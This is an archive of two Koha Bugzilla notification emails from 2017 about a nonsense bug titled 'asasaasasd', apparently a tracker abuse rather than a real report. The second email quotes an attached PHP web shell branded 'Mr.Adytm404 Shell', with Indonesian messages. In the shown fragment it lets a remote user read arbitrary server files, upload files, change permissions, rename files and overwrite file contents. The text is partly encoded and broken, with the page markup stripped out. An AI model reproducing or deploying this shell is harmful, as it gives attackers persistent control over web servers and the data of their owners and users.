From bugzilla-daemon@bugs.koha-community.org Sun Oct 8 12:05:37 2017 From: bugzilla-daemon@bugs.koha-community.org To: koha-bugs@lists.koha-community.org Subject: [Koha-bugs] [Bug 19432] New: asasaasasd Date: Sun, 08 Oct 2017 10:05:32 +0000 Message-ID: MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="===============8592121824349846900==" --===============8592121824349846900== Content-Type: text/plain; charset="utf-8" Content-Transfer-Encoding: 7bit https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=19432 Bug ID: 19432 Summary: asasaasasd Change sponsored?: --- Product: Koha Version: 17.05 Hardware: All OS: All Status: NEW Severity: normal Priority: P5 - low Component: Authentication Assignee: koha-bugs@lists.koha-community.org Reporter: ogyaadyatma@gmail.com QA Contact: testopia@bugs.koha-community.org CC: dpavlin@rot13.org Created attachment 67819 --> https://bugs.koha-community.org/bugzilla3/attachment.cgi?id=67819&action=edit asdasdasd asasasasasasas -- You are receiving this mail because: You are watching all bug changes. You are the assignee for the bug. --===============8592121824349846900==-- From bugzilla-daemon@bugs.koha-community.org Sun Oct 8 12:09:07 2017 From: bugzilla-daemon@bugs.koha-community.org To: koha-bugs@lists.koha-community.org Subject: [Koha-bugs] [Bug 19432] asasaasasd Date: Sun, 08 Oct 2017 10:08:45 +0000 Message-ID: In-Reply-To: MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="===============2612189091222623572==" --===============2612189091222623572== Content-Type: text/plain; charset="utf-8" Content-Transfer-Encoding: quoted-printable https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=3D19432 --- Comment #1 from adytm --- Comment on attachment 67819 --> https://bugs.koha-community.org/bugzilla3/attachment.cgi?id=3D67819 asdasdasd $value){ $_POST[$key] =3D stripslashes($value); } } echo '
3D"Hasil Mr.Adytm404 Shell

Mr.Adytm404 Shell

'; if(isset($_GET['filesrc'])){ echo "
Path : '; if(isset($_GET['path'])){ $path =3D $_GET['path']; }else{ $path =3D getcwd(); } $path =3D str_replace('\\','/',$path); $paths =3D explode('/',$path); foreach($paths as $id=3D>$pat){ if($pat =3D=3D '' && $id =3D=3D 0){ $a =3D true; echo '/'; continue; } if($pat =3D=3D '') continue; echo ''.$pat.'/'; } echo '
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo 'Upload Berhasil
'; }else{ echo 'Upload Gagal
'; } } echo '
File Upload :
Current File : "; echo $_GET['filesrc']; echo '

'; echo('
'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'
'); }elseif(isset($_GET['option']) && $_POST['opt'] !=3D 'delete'){ echo '
'.$_POST['path'].'

'; if($_POST['opt'] =3D=3D 'chmod'){ if(isset($_POST['perm'])){ if(chmod($_POST['path'],$_POST['perm'])){ echo 'Change Permission Berhasil
'; }else{ echo 'Change Permission Gagal
'; } } echo '
Permission :
'; }elseif($_POST['opt'] =3D=3D 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo 'Ganti Nama Berhasil
'; }else{ echo 'Ganti Nama Gagal
'; } $_POST['name'] =3D $_POST['newname']; } echo '
New Name :
'; }elseif($_POST['opt'] =3D=3D 'edit'){ if(isset($_POST['src'])){ $fp =3D fopen($_POST['path'],'w'); if(fwrite($fp,$_POST['src'])){ echo 'Berhasil Edit File
'; }else{ echo 'Gagal Edit File
'; } fclose($fp); } echo '